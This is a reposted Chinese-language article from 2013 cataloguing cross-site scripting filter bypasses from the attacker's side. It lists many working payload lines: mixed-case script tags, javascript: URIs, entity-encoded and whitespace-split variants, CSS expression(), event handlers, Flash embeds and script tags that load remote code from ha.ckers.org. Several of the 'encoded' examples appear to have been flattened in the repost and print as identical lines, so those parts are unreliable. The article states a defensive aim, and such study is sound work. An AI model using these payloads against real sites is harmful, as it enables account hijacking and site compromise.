2013-04-06 13:36:53
http://www.2cto.com/Article/201304/200573.html
一、标题：XSS的常见变换 --XSS攻击发展

二、摘要：
本文从攻击者的角度来给大家分析XSS的常见过滤和绕过，基本上也是XSS攻击的一个发展过程。

三、说明：
参阅了互联网上一些XSS攻防实战的例子，汇总成此文。当然，尚待完善。大家有意见请多多指正。
XSS不具有浏览器通用性。不同的浏览器对同一XSS的适用不一样。相比较而言，IE8和Firefox相对更安全，本身就对XSS攻击有更严格的过滤。而IE6的安全性一般，即使攻击者的代码有些“变形”，浏览器还是会“尽力而为”的解析。而其他的一些浏览器如opera，XSS安全处理可能做得更差。
本文基本上是在IE6的基础上给大家分析XSS的变形和绕过。以便大家有针对性的防护。

四、具体内容
XSS的一般原始构造:
<script>alert("anyunix")</script>
    上述构造方式由于太过直接而容易被过滤，实际上，针对不同站点的不同过滤机制，对原始构造的适当变形有时就能绕过不少对XSS的检测。

五、发展
1:很简单，大家都知道会把<script>过滤掉,却往往忽略了大小写:
<sCripT>alert("anyunix")</Script>

2:<script>彻底被过滤了也不要紧，很多对象可以支持“javascript:”的形式代码执行:
<IMG SRC=javascript:alert("anyunix")>

3：当简单的"javascript"形式也被彻底过滤后。我们发现很多对象支持“&#ASCII”的表示方法，
<img src=javascript:alert("anyunix")>
<img src=javascript:alert('anyunix')>
<img src=javascript:alert('anyunix')>
<img src=javascript:alert('anyunix')>
a可以写成a,a直至a也是可以执行的。
a也是可以写成=,=直至=的。

4:如果上述编码亦被还原过滤，可以填入空格、制表符、换行符等空白字符：
<IMG SRC="jav ascript:alert('anyunix');">

5:也可以嵌入编码过后的TAB键等,char09,char10,char13都可以被嵌入:
<IMG SRC="jav ascript:alert('anyunix');">
<IMG SRC="jav ascript:alert('anyunix');">
<IMG SRC="jav ascript:alert('anyunix');">

6:当直接用“javascript”终于被彻底禁绝，我们还可以使用其他属性执行XSS。
<DIV STYLE="width:expression(alert('anyunix'));">
<IMG SRC='vbscript:msgbox("anyunix")'>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

7:然后，理所当然衍生了新的绕过方式和利用形式。
A):插入注释/*....*/做干扰
<IMG STYLE="xss:expr/*XSS*/ession(alert('anyunix'))">
    B):全角字符的干扰
<DIV STYLE="width:ｅｘpreｓsion(alert('anyunix'));">
    C):“\”的干扰
<STYLE>@im\po\rt'http://ha.ckers.org/xss.css';</STYLE>

8:如果直接执行被完全过滤，那我们就利用事件来执行XSS
<img src="#"onerror=alert('anyunix')>
<img src=http://www.2cto.com/uploadfile/2013/0406/20130406014607478.png"onmousemove=alert(163)>
<BODY ONLOAD=alert('anyunix')>
<isindex type=imagesrc=1onerror=alert('anyunix')>

9:flash可以用来执行XSS
<EMBED SRC="http://ha.ckers.org/xss.swf"AllowScriptAccess="always"></EMBED>

10:也可以利用各种其他标签
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<LINK REL="stylesheet"HREF="http://ha.ckers.org/xss.css">
<TABLE BACKGROUND="javascript:alert('XSS')">
其他的一些用于混淆、干扰和绕过的bypass实例:
<SCRIPTa=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPTa=">'>"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
perl-e'print"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";'>out
<IMG SRC=" javascript:alert('XSS');">

    如上，就是一些比较常见和实用的XSS绕过方法。在实际的运用中，往往是多种方法结合起来。
更多更详尽的XSS测试脚本，可参见http://ha.ckers.org/xss.html建议参阅《OWASP测试指南》，对一些相关的web安全知识做全面的了解。
By:anyunix

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！